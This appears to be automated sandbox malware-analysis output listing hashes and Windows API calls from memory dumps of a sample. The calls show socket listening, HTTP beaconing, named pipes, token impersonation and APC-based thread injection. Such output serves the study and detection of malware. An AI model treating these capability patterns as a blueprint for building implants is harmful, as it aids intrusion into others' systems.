                            • Opcode Fuzzy Hash: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                            • Instruction Fuzzy Hash: EED18EB3D1B9B34A8735812D516823BEE626FD175131FC3E29CD43F38E922A9D0596E0
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                            • Associated: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                            • Instruction ID: eb153aff6c78c3e50fc4acb6481ee2cdd4d61393408d37f29857966efd8d1c41
                            • Opcode Fuzzy Hash: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                            • Instruction Fuzzy Hash: 00D16E73D0E9F30A8B36812D4168A3BEA626FD175131FC7E09CD42F28ED5279D1296E0
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_db0000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                            • Instruction ID: 35d7af85e2380425002d049eea17c84f97b002f2fdede9f2fc2bd6f80c6d66ad
                            • Opcode Fuzzy Hash: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                            • Instruction Fuzzy Hash: 95D16DB3D1B9B34B8736812D555863BEA626FD174132EC3E2DCD02F38DD22A9D0596E0
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                            • Associated: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                            • Instruction ID: efa6eb22b3d5bcc2d0fb1c148ee5ea27e6c2c64a7a8f3b6a086e2ed3e41bbff5
                            • Opcode Fuzzy Hash: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                            • Instruction Fuzzy Hash: 03D15F73D0E9B30A8B35812D4158A3BEAA26FD175531EC7E1DCD43F28BD6279D0296E0
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_db0000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                            • Instruction ID: 9a331a35ab29ac99f8c2fc9dc945c68f0c8a77209035c62b79929aca63ac92a7
                            • Opcode Fuzzy Hash: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                            • Instruction Fuzzy Hash: F0C15EB3D1BAF30B8736812D555823BEE626FD175131EC3E28CD42F38E962A9D0595E0
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                            • Associated: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                            • Instruction ID: 1ffff1910c16ad05e8318616d904641d44652b0ca872a159a275ee5fe6397d80
                            • Opcode Fuzzy Hash: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                            • Instruction Fuzzy Hash: 1DC15F73D0E9F30A8B75816D416892BEEA26FD165131FC7E1CCD43F28B92279D0695E0
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_db0000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                            • Instruction ID: 1ac66ec217e88482d70d4203b4be3ec0d72d524c7aa3c4de0a74d799f2395903
                            • Opcode Fuzzy Hash: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                            • Instruction Fuzzy Hash: FAC15C73D1B9B30B8735822D455813BEAA26FD174132FC7A29CD42F38DD63A9D0595E0
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                            • Associated: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                            • Instruction ID: 6697727c87e02290b33c309a51a50f7b6c555048f46d96a60abe1be685722a3f
                            • Opcode Fuzzy Hash: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                            • Instruction Fuzzy Hash: D8C15F73D0E9F30A8B35822D4158A3BEAA26FD175131FC7E19CD42F28BD6279D0295E0
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_db0000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0a7232b9ed9669d881f4893b4c8615f0ca151278e9e7f5d9bb8b2fa9bed21a24
                            • Instruction ID: 46555ffbed5e9c32628a3f09bd3f0c2a2a625411bf75711ce067e1c17218644d
                            • Opcode Fuzzy Hash: 0a7232b9ed9669d881f4893b4c8615f0ca151278e9e7f5d9bb8b2fa9bed21a24
                            • Instruction Fuzzy Hash: 5791BD74E0020ADFCF08CF89C5909EEBBB1BF48315F24819AD8566B315D375AA41DFA5
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_db0000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0a7232b9ed9669d881f4893b4c8615f0ca151278e9e7f5d9bb8b2fa9bed21a24
                            • Instruction ID: ee2310002b63b9cc1ea82e3fd0c83cabff4963a59b9b5bec4ac5a57f28e3bb07
                            • Opcode Fuzzy Hash: 0a7232b9ed9669d881f4893b4c8615f0ca151278e9e7f5d9bb8b2fa9bed21a24
                            • Instruction Fuzzy Hash: 6E91BF78E0020ADFCF08CF89C5909EDBBB1BF48315F248199D8566B355D734AA81CFA6
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                            • Associated: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0a7232b9ed9669d881f4893b4c8615f0ca151278e9e7f5d9bb8b2fa9bed21a24
                            • Instruction ID: 0f3cc21bad1efbeea8bcc2402dc144707e06a34cff18369b95d10f8045d6f4f6
                            • Opcode Fuzzy Hash: 0a7232b9ed9669d881f4893b4c8615f0ca151278e9e7f5d9bb8b2fa9bed21a24
                            • Instruction Fuzzy Hash: 8891B074E00209DFCF18CF89C5909ADBBB1BF88315F24C199E8556B315E334AA81CFA6
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                            • Associated: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0a7232b9ed9669d881f4893b4c8615f0ca151278e9e7f5d9bb8b2fa9bed21a24
                            • Instruction ID: eff622927b6328376c163afcf9c2cc03ede3584e4352a5c5ebe2d5867e2a7dd5
                            • Opcode Fuzzy Hash: 0a7232b9ed9669d881f4893b4c8615f0ca151278e9e7f5d9bb8b2fa9bed21a24
                            • Instruction Fuzzy Hash: 2391BF74E0020ADFCF08CF89C5909AEBBB1BF88315F24C199D815AB315D335AA41CFA6
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                            • Associated: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ff2b6f834b16b78025c083963c8e988e93abbc0d3e50f43d867b2c402f0a1f38
                            • Instruction ID: 82954a7b4b728540b7ee90e9090fdd0b9fccebb58dfa892c8e70b5cfc6a053b7
                            • Opcode Fuzzy Hash: ff2b6f834b16b78025c083963c8e988e93abbc0d3e50f43d867b2c402f0a1f38
                            • Instruction Fuzzy Hash: 9C41DD76D042A10ECF1ABB788C511BDBFF1FF2A72075A15AAD0D6EA343D5108581DBB4
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_db0000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: _malloc
                            • String ID:
                            • API String ID: 1579825452-0
                            • Opcode ID: 2de99cd372809c886073451b6248ffc06870ab6b4f6c49016a89b208377a13cc
                            • Instruction ID: e523289832bd5ea69f6e54daa715cf98603feb4841b9c4331ee0421d389ff57b
                            • Opcode Fuzzy Hash: 2de99cd372809c886073451b6248ffc06870ab6b4f6c49016a89b208377a13cc
                            • Instruction Fuzzy Hash: 8E413CB2E0020AAFDB04DFA9D881BAEB7B5EF48310F19816DE905E7345D634ED41DB60
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                            • Associated: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: _malloc
                            • String ID:
                            • API String ID: 1579825452-0
                            • Opcode ID: 2de99cd372809c886073451b6248ffc06870ab6b4f6c49016a89b208377a13cc
                            • Instruction ID: cd9c800b350a829c12c456d56206356295ebf6c52889aa033d970f161b3c11e6
                            • Opcode Fuzzy Hash: 2de99cd372809c886073451b6248ffc06870ab6b4f6c49016a89b208377a13cc
                            • Instruction Fuzzy Hash: 1C411CB6E0020AAFDB04DFA8C881AAEB7B5FF48310F15816DE905E7345D774AD018B60
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_db0000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 40d8af6ddd94688b72605046ddb6f72551a02b4cee13cb77aaae89ab7b456c96
                            • Instruction ID: 0901f5e4c5bce1b5545589644eda22f9aefbdf66cda22a16593b84d5d0034a63
                            • Opcode Fuzzy Hash: 40d8af6ddd94688b72605046ddb6f72551a02b4cee13cb77aaae89ab7b456c96
                            • Instruction Fuzzy Hash: D441C4759101688FCF48CF9DE8D48EDBBF2FB8D341B45811AE542AB395C638A950CB34
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                            • Associated: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 40ac596cf5526f95ef1f466b5cf0f103403ad38103e58a0c2d3626243e9624f4
                            • Instruction ID: 4d04bcd3cfa1cf7c557f6d800d88bc0481c994f7f24cb260750b3e84cb4f3cf1
                            • Opcode Fuzzy Hash: 40ac596cf5526f95ef1f466b5cf0f103403ad38103e58a0c2d3626243e9624f4
                            • Instruction Fuzzy Hash: 3141A4749101688FDF49CF5DE8E08EDBBF2FB8D341B45811AE542BB396C638A910DB20
                            APIs
                            • htonl.WS2_32(?), ref: 00DB8B54
                            • select.WS2_32(00000000,?,?,?,?), ref: 00DB8BB8
                            • __WSAFDIsSet.WS2_32(00000000,?), ref: 00DB8BD4
                            • accept.WS2_32(00000000,00000000,00000000), ref: 00DB8BE9
                            • ioctlsocket.WS2_32(00000000,8004667E,?), ref: 00DB8BFC
                              • Part of subcall function 00DB8520: _malloc.LIBCMT ref: 00DB8527
                              • Part of subcall function 00DB8520: GetTickCount.KERNEL32 ref: 00DB8547
                              • Part of subcall function 00DB16CB: _malloc.LIBCMT ref: 00DB16D1
                              • Part of subcall function 00DB171B: htonl.WS2_32(0000001F), ref: 00DB1721
                              • Part of subcall function 00DB1864: _memset.LIBCMT ref: 00DB1872
                            • __WSAFDIsSet.WS2_32(00000000,?), ref: 00DB8C89
                            • accept.WS2_32(00000000,00000000,00000000), ref: 00DB8C9B
                            • closesocket.WS2_32(?), ref: 00DB8DA9
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_db0000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: _mallocaccepthtonl$CountTick_memsetclosesocketioctlsocketselect
                            • String ID: d
                            • API String ID: 4083423528-2564639436
                            • Opcode ID: bc103241b8e96befb43764d9cf0043f1254703e56a3f52022a9a4d1873ff9630
                            • Instruction ID: 451eb5bb1a47260c44d893d4ed87a79b0a140103c0356e0637f5786351e7c0db
                            • Opcode Fuzzy Hash: bc103241b8e96befb43764d9cf0043f1254703e56a3f52022a9a4d1873ff9630
                            • Instruction Fuzzy Hash: 68711C71800608EFDB21EFA5DC45ADEBBBCEB54310F1445ABE956E3291EB309A44DB70
                            APIs
                            • _memset.LIBCMT ref: 00DB298D
                            • _memset.LIBCMT ref: 00DB29A2
                            • __snprintf.LIBCMT ref: 00DB2A0E
                            • _memset.LIBCMT ref: 00DB2A1C
                            • __snprintf.LIBCMT ref: 00DB2A3A
                            • __snprintf.LIBCMT ref: 00DB2A59
                            • __snprintf.LIBCMT ref: 00DB2AF7
                            • __snprintf.LIBCMT ref: 00DB2B0E
                            • HttpOpenRequestA.WININET(00000000,?,00000000,00000000,00DE1540,00DEFFC4), ref: 00DB2B4B
                            • HttpSendRequestA.WININET(00000000,?,?,?,?), ref: 00DB2B74
                            • InternetCloseHandle.WININET(00000000), ref: 00DB2B86
                            • Sleep.KERNEL32(000001F4), ref: 00DB2B8D
                            • InternetCloseHandle.WININET(00000000), ref: 00DB2B9E
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: __snprintf$_memset$CloseHandleHttpInternetRequest$OpenSendSleep
                            • String ID: %s%s$*/*
                            • API String ID: 3375730287-856325523
                            • Opcode ID: 520701835c939000656ab4db097b5b054e1a3ed18aa6f11b911689524fcbd1e0
                            • Instruction ID: 833ad3be4f4b3a916c6af0051c82ec982080a82fd2d2bf2a0d67dbef3d3c8875
                            • Opcode Fuzzy Hash: 520701835c939000656ab4db097b5b054e1a3ed18aa6f11b911689524fcbd1e0
                            • Instruction Fuzzy Hash: 9061B272900259EFDB11ABA4DC85EFE7BB9FF05304F0400A6F606A7212DB319E498B75
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                            • Associated: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: __snprintf$_memset$HttpRequest$OpenSendSleep
                            • String ID: %s%s$*/*
                            • API String ID: 211597586-856325523
                            • Opcode ID: 0e8e5819ab4ac94f711b280d2c462ac47750f95f73deca21dc1ae3b3ad1e2778
                            • Instruction ID: 833ad3be4f4b3a916c6af0051c82ec982080a82fd2d2bf2a0d67dbef3d3c8875
                            • Opcode Fuzzy Hash: 0e8e5819ab4ac94f711b280d2c462ac47750f95f73deca21dc1ae3b3ad1e2778
                            • Instruction Fuzzy Hash: 9061B272900259EFDB11ABA4DC85EFE7BB9FF05304F0400A6F606A7212DB319E498B75
                            APIs
                            • _memset.LIBCMT ref: 00DB489E
                            • _memset.LIBCMT ref: 00DB48BA
                              • Part of subcall function 00DB31C8: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000400,00DB4ACB,?,00DB48E4,00DB4ACB,?,00000400), ref: 00DB31DE
                              • Part of subcall function 00DB31C8: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00DB4ACB,00DB48E4,?,00DB48E4,00DB4ACB,?,00000400,?,?,?,?,00DB4ACB), ref: 00DB31F7
                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00DB4ACB,?,?,?,00DB9320), ref: 00DB4904
                            • GetCurrentDirectoryW.KERNEL32(00000400,?,?,?,?,?,?,?,?,00DB4ACB,?,?,?,00DB9320), ref: 00DB4913
                            • CreateProcessWithTokenW.ADVAPI32(00000002,00000000,?,C0330CC4,00000000,?,C3E8296A,83FFFFDB), ref: 00DB4946
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: ByteCharCurrentDirectoryMultiWide_memset$CreateProcessTokenWith
                            • String ID: sysnative$system32
                            • API String ID: 2486443368-2461298002
                            • Opcode ID: 10792a0f4286fa8aa09d3cb9169d2872d3cf3f64d47901b62f7437a7188a687e
                            • Instruction ID: 098e20b5ccb69cc2b6a406492823cce3200a500d3df74ee8084aff5b8ff6f814
                            • Opcode Fuzzy Hash: 10792a0f4286fa8aa09d3cb9169d2872d3cf3f64d47901b62f7437a7188a687e
                            • Instruction Fuzzy Hash: E951D372604345EFD721EF64DC85EEB77E9EF85314F14082AE58AC7212EA31D9088B75
                            APIs
                            • GetTickCount.KERNEL32 ref: 00DB79BB
                            • GetTickCount.KERNEL32 ref: 00DB79C5
                            • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000003,00100000,00000000), ref: 00DB79DF
                            • GetLastError.KERNEL32 ref: 00DB79EC
                            • WaitNamedPipeA.KERNEL32(?,00002710), ref: 00DB7A01
                            • Sleep.KERNEL32(000003E8), ref: 00DB7A0E
                            • GetTickCount.KERNEL32 ref: 00DB7A14
                            • GetLastError.KERNEL32 ref: 00DB7A2A
                            • GetLastError.KERNEL32 ref: 00DB7A3A
                            • SetNamedPipeHandleState.KERNEL32(?,?,00000000,00000000), ref: 00DB7A58
                            • GetLastError.KERNEL32 ref: 00DB7A62
                            • DisconnectNamedPipe.KERNEL32(?), ref: 00DB7A9C
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLast$CountNamedPipeTick$CreateDisconnectFileHandleSleepStateWait
                            • String ID:
                            • API String ID: 34948862-0
                            • Opcode ID: e8d41e175776ac855918c3e71b9abf45a6f7486e17e9dc2388c0ed026aa108f1
                            • Instruction ID: a2a5aab4758796897123a698e6082dd1bf037c42d6964077f211c45f32ba0aad
                            • Opcode Fuzzy Hash: e8d41e175776ac855918c3e71b9abf45a6f7486e17e9dc2388c0ed026aa108f1
                            • Instruction Fuzzy Hash: A021B531608309EBEB516BB49C86BFE379DAB85724F210427F61BE61D1EB605A404671
                            APIs
                            • GetTickCount.KERNEL32 ref: 00DB892A
                            • select.WS2_32(00000000,00000000,?,?,00000000), ref: 00DB8975
                            • __WSAFDIsSet.WS2_32(?,?), ref: 00DB8985
                            • __WSAFDIsSet.WS2_32(?,?), ref: 00DB8998
                            • GetTickCount.KERNEL32 ref: 00DB89A1
                            • gethostbyname.WS2_32(?), ref: 00DB89AC
                            • htons.WS2_32(?), ref: 00DB89BF
                            • inet_addr.WS2_32(?), ref: 00DB89CB
                            • sendto.WS2_32(?,00000000,?,00000000,?,00000010), ref: 00DB89E5
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_db0000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: CountTick$gethostbynamehtonsinet_addrselectsendto
                            • String ID: d
                            • API String ID: 1257931466-2564639436
                            • Opcode ID: 60de7127a2569c6982c6801e6b43fe11902c5454986afb80b1961dbb2ace13fe
                            • Instruction ID: bd92605dc3836defcdab63837cea2680fe4d6ee2628ebaa732671640b54cb5e9
                            • Opcode Fuzzy Hash: 60de7127a2569c6982c6801e6b43fe11902c5454986afb80b1961dbb2ace13fe
                            • Instruction Fuzzy Hash: D1214C71900309EBDF119F90DC45BEE7BB9EF08311F1000A7E905E6291EB71DA55AFA1
                            APIs
                            • htonl.WS2_32 ref: 00DBE13C
                            • htonl.WS2_32(?), ref: 00DBE14C
                            • GetLastError.KERNEL32 ref: 00DBE176
                            • OpenProcessToken.ADVAPI32(00000000,00000000,00000008), ref: 00DBE19A
                            • GetLastError.KERNEL32 ref: 00DBE1A4
                            • ImpersonateLoggedOnUser.ADVAPI32(00000008), ref: 00DBE1C3
                            • GetLastError.KERNEL32 ref: 00DBE1C9
                            • DuplicateTokenEx.ADVAPI32(00000008,02000000,00000000,00000003,00000001,00DF08A4), ref: 00DBE1E8
                            • GetLastError.KERNEL32 ref: 00DBE1F2
                            • ImpersonateLoggedOnUser.ADVAPI32 ref: 00DBE204
                            • GetLastError.KERNEL32 ref: 00DBE20A
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_db0000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLast$ImpersonateLoggedTokenUserhtonl$DuplicateOpenProcess
                            • String ID:
                            • API String ID: 332438066-0
                            • Opcode ID: 940b190c56af7eead9bbcfb956c25caf8f04b4225f31c599dc4bdaa94c7ab40a
                            • Instruction ID: 57953672c2210bc57074f3a9965a1fb399c7b08bf48472aee7509d627c487cc0
                            • Opcode Fuzzy Hash: 940b190c56af7eead9bbcfb956c25caf8f04b4225f31c599dc4bdaa94c7ab40a
                            • Instruction Fuzzy Hash: E431B575904309FBEB106BA5DC49FFA3BBDDF41799F28402AF603D6191EB7089048A71
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                            • Associated: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: __encode_pointer$__decode_pointer$__calloc_crt__crt_waiting_on_module_handle__init_pointers__initptd__mtterm
                            • String ID:
                            • API String ID: 3005113738-0
                            • Opcode ID: f4f16914d6c516e466c7836a4cd309be2a1a7730aeb4c8532e1b1462738c008c
                            • Instruction ID: 94bebc15a2b9fba62c64b6f1ca3147eb08032258fcc6b53ad2b962054e8e5c4f
                            • Opcode Fuzzy Hash: f4f16914d6c516e466c7836a4cd309be2a1a7730aeb4c8532e1b1462738c008c
                            • Instruction Fuzzy Hash: BA313371850728EFFB12BF7A9CC6A193BA4EB05720B15262AF514DB1B2EB358441DF70
                            APIs
                            • GetTickCount.KERNEL32 ref: 00DB8864
                            • select.WS2_32(00000000,00000000,?,?,00000000), ref: 00DB88B2
                            • __WSAFDIsSet.WS2_32(?,?), ref: 00DB88C2
                            • __WSAFDIsSet.WS2_32(?,?), ref: 00DB88D5
                            • send.WS2_32(?,00000000,?,00000000), ref: 00DB88E9
                            • WSAGetLastError.WS2_32(?,00000000,?,00000000,?,?,?,?), ref: 00DB88F3
                            • Sleep.KERNEL32(000003E8), ref: 00DB8905
                            • GetTickCount.KERNEL32 ref: 00DB890B
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_db0000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: CountTick$ErrorLastSleepselectsend
                            • String ID: d
                            • API String ID: 2152284305-2564639436
                            • Opcode ID: 264b56dc4c07975da55f2ab3c7a5883d1d9d985ca410aa1de41777f1df7fba94
                            • Instruction ID: ad72b82b333915dd9287dad4c560401fd23fb128bf38bb334237de21f2ed918b
                            • Opcode Fuzzy Hash: 264b56dc4c07975da55f2ab3c7a5883d1d9d985ca410aa1de41777f1df7fba94
                            • Instruction Fuzzy Hash: 0611903184020DEBDF119F64DC85BE97BBCFB08314F1001A7E615D21A0EBB09E819FA0
                            APIs
                            • GetTickCount.KERNEL32 ref: 00DB3757
                            • GetLastError.KERNEL32 ref: 00DB37B7
                            • GetTickCount.KERNEL32 ref: 00DB37C2
                            • Sleep.KERNEL32(000003E8), ref: 00DB37CD
                            • GetLastError.KERNEL32 ref: 00DB37D9
                            • WriteFile.KERNEL32(?,?,00000004,?,00000000), ref: 00DB380B
                            • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00DB3836
                            • FlushFileBuffers.KERNEL32(?), ref: 00DB384A
                            • DisconnectNamedPipe.KERNEL32(?), ref: 00DB3853
                            • Sleep.KERNEL32(000003E8), ref: 00DB3866
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$CountErrorLastSleepTickWrite$BuffersDisconnectFlushNamedPipe
                            • String ID:
                            • API String ID: 3101085627-0
                            • Opcode ID: 025b19708d78a27d441bb2671cdb6a4e8a64585d7640623aa128e677628c9b55
                            • Instruction ID: 203481af661b36872f218c4ada17c487b8556bc08f153c7260eeea54ebb49ce8
                            • Opcode Fuzzy Hash: 025b19708d78a27d441bb2671cdb6a4e8a64585d7640623aa128e677628c9b55
                            • Instruction Fuzzy Hash: 0C3108B6D00219EBDB01EBA4DC86AEEB7B8EB04714F150066E506E6250DB31AF44DBB1
                            APIs
                            • GetModuleHandleA.KERNEL32(ntdll,NtQueueApcThread,00000000,00000000), ref: 00DB6704
                            • GetProcAddress.KERNEL32(00000000), ref: 00DB670B
                              • Part of subcall function 00DB6638: _malloc.LIBCMT ref: 00DB6657
                            • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 00DB673A
                            • Thread32First.KERNEL32(00000000,0000001C), ref: 00DB674F
                            • Thread32Next.KERNEL32(00000000,0000001C), ref: 00DB678E
